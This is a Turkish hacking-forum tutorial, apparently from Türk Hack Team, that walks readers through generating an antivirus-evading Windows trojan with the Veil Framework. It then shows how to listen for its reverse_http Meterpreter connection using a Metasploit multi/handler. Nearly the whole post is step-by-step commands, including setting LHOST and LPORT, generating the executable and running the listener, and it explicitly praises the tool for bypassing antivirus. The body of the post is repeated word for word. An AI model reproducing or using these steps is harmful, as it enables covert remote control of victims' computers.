Merhaba değerli Türk Hack Team üyeleri. Bu konumda sizlere başlıkta belirttiğim gibi trojanı dinlemeyi göstereceğim. Makinem müsait olsaydı meterpreter dan sonrasını da anlatırdım ama pc bu durum için biraz iyi durumda değil. Konumuza geçelim.
Öğrenecekleriniz;
1-) Kısaca Veil Framework Aracı Nedir?
2- ) Veil Aracından Bir Trojan Oluşturma
3- ) Bu Trojanı Dinlemeye Alma
Başlayalım o halde.
Kısaca Veil Framework Aracı
Veil içinde çeşitli dillerle yazılmış payloadlar trojanler virüsler nasıl şekilde tabir ederseniz. Bunlardan barındırmaktadır. Bu aracın güzel kısmı içinde çeşitli filtreler barındırmaktadır. Bu filtreler sayesinde anti virüs programlarını By Pass etme atlatmamıza yarıyor. Yani anti virüs programlarına yakalanmamamızı sağlıyor aslında.
Trojanımızı Oluşturalım;
Şimdi bende araç kuruluydu. Aracın kurulumu gayet basit. Burda anlatmayacağım daha önce anlatmıştım. Siz isterseniz araştırabilrisiniz eğer kurulu değilse. Terminalimizi açalım.
Kod:
sudo su
Roota kesinlikle geçiş yapın kesinlikle.
Kod:
cd Desktop
Aracım masaüstünde kuruluydu. Masaüstüne geçtim.
Kod:
cd Veil
Aracıma geçtim bu komut ile.
Kod:
python3 Veil.py
Ve aracımı çalıştırdım karşımıza şöyle bir ekran gelecek.
Not: Eğer setup işlemleri yapmadıysanız bunları da yapın.
Evet şimdi ise burdan 1. seçeneği seçeceğiz.
Kod:
use 1
Daha sonra bize 41 payload olduğunu söylüyor bunları listeleyelim.
Kod:
list
Daha sonra ben bu anlatımda 14. seçeneği seçeceğim.
Kod:
use 14
Ve şöyle bir ekran gelecek karşımıza;
Burdan zorunlu olarak LHOST local ıp adresimiz ve LPORT portumuzu değiştirmeliyiz. Gerisi anti virüsleri atlatmak için opsiyonel seçenekler. Bu anlatımda onlarla oynamaya gerek yok zaten bir yere atmayacağım. Sadece dinlemeye almayı göstereceğim.
Kod:
set LHOST ıp niz
Kod:
set LPORT 4444
Yapabilirsiniz portu.
Daha sonra;
Kod:
generate
Diyoruz ve bizden trojana bir isim istiyor.
Kod:
veiltestvirüs
Yapıyorum ben. Eğer bir hata alırsanız trojan oluşmazsa root değilsinizdir. Roota geçiş yapın.
Eğer bir sorun olmazsa şöyle bir ekran gelecek karşımıza;
Trojan oluşuyor oluşunca size yerini belirtecek.
/var/lib/veil/output/compiled/veiltestvirüs.exe
Trojanı Dinlemeye Alalım
Bende bu dizinlere kurmuş. Şimdi buna gerek yok buraya gitmeye. Zaten dinlemeye alcaz. Kapatın bu terminali yenisini açın.
Kod:
msfconsole
Yapıp ****sploit i başlatıyoruz.
Sizde ekran farklı çıkabilir ona aldırış etmeyin. Daha sonra burdan;
Kod:
use exploit/multi/handler
Dİyerek multi handler a geçiş yapıyoruz. Sonrasında Payload ımızı seçeceğiz
Kod:
set PAYLOAD windows/meterpreter/reverse_http
NOT: Şİmdi 14. payload için kullanılan reverse_http dir. Dİğerlerinde farklı olabilir.
Sonrasında IP ve PORT belirleyeceğiz.
Kod:
set LHOST IP NIZ
Kod:
set LPORT 4444
Daha sonra dinlemek için sömür yani
Kod:
exploit
Dİyoruz ve dinlemeye alındı trojanımız.
Evet konum bu kadardı umarım yararlı olur. İyi forumlar dilerim hepinize.
1-) Kısaca Veil Framework Aracı Nedir?
2- ) Veil Aracından Bir Trojan Oluşturma
3- ) Bu Trojanı Dinlemeye Alma
Başlayalım o halde.
Kısaca Veil Framework Aracı
Veil içinde çeşitli dillerle yazılmış payloadlar trojanler virüsler nasıl şekilde tabir ederseniz. Bunlardan barındırmaktadır. Bu aracın güzel kısmı içinde çeşitli filtreler barındırmaktadır. Bu filtreler sayesinde anti virüs programlarını By Pass etme atlatmamıza yarıyor. Yani anti virüs programlarına yakalanmamamızı sağlıyor aslında.
Trojanımızı Oluşturalım;
Şimdi bende araç kuruluydu. Aracın kurulumu gayet basit. Burda anlatmayacağım daha önce anlatmıştım. Siz isterseniz araştırabilrisiniz eğer kurulu değilse. Terminalimizi açalım.
Kod:
sudo su
Roota kesinlikle geçiş yapın kesinlikle.
Kod:
cd Desktop
Aracım masaüstünde kuruluydu. Masaüstüne geçtim.
Kod:
cd Veil
Aracıma geçtim bu komut ile.
Kod:
python3 Veil.py
Ve aracımı çalıştırdım karşımıza şöyle bir ekran gelecek.
Not: Eğer setup işlemleri yapmadıysanız bunları da yapın.
Evet şimdi ise burdan 1. seçeneği seçeceğiz.
Kod:
use 1
Daha sonra bize 41 payload olduğunu söylüyor bunları listeleyelim.
Kod:
list
Daha sonra ben bu anlatımda 14. seçeneği seçeceğim.
Kod:
use 14
Ve şöyle bir ekran gelecek karşımıza;
Burdan zorunlu olarak LHOST local ıp adresimiz ve LPORT portumuzu değiştirmeliyiz. Gerisi anti virüsleri atlatmak için opsiyonel seçenekler. Bu anlatımda onlarla oynamaya gerek yok zaten bir yere atmayacağım. Sadece dinlemeye almayı göstereceğim.
Kod:
set LHOST ıp niz
Kod:
set LPORT 4444
Yapabilirsiniz portu.
Daha sonra;
Kod:
generate
Diyoruz ve bizden trojana bir isim istiyor.
Kod:
veiltestvirüs
Yapıyorum ben. Eğer bir hata alırsanız trojan oluşmazsa root değilsinizdir. Roota geçiş yapın.
Eğer bir sorun olmazsa şöyle bir ekran gelecek karşımıza;
Trojan oluşuyor oluşunca size yerini belirtecek.
/var/lib/veil/output/compiled/veiltestvirüs.exe
Trojanı Dinlemeye Alalım
Bende bu dizinlere kurmuş. Şimdi buna gerek yok buraya gitmeye. Zaten dinlemeye alcaz. Kapatın bu terminali yenisini açın.
Kod:
msfconsole
Yapıp ****sploit i başlatıyoruz.
Sizde ekran farklı çıkabilir ona aldırış etmeyin. Daha sonra burdan;
Kod:
use exploit/multi/handler
Dİyerek multi handler a geçiş yapıyoruz. Sonrasında Payload ımızı seçeceğiz
Kod:
set PAYLOAD windows/meterpreter/reverse_http
NOT: Şİmdi 14. payload için kullanılan reverse_http dir. Dİğerlerinde farklı olabilir.
Sonrasında IP ve PORT belirleyeceğiz.
Kod:
set LHOST IP NIZ
Kod:
set LPORT 4444
Daha sonra dinlemek için sömür yani
Kod:
exploit
Dİyoruz ve dinlemeye alındı trojanımız.
Evet konum bu kadardı umarım yararlı olur. İyi forumlar dilerim hepinize.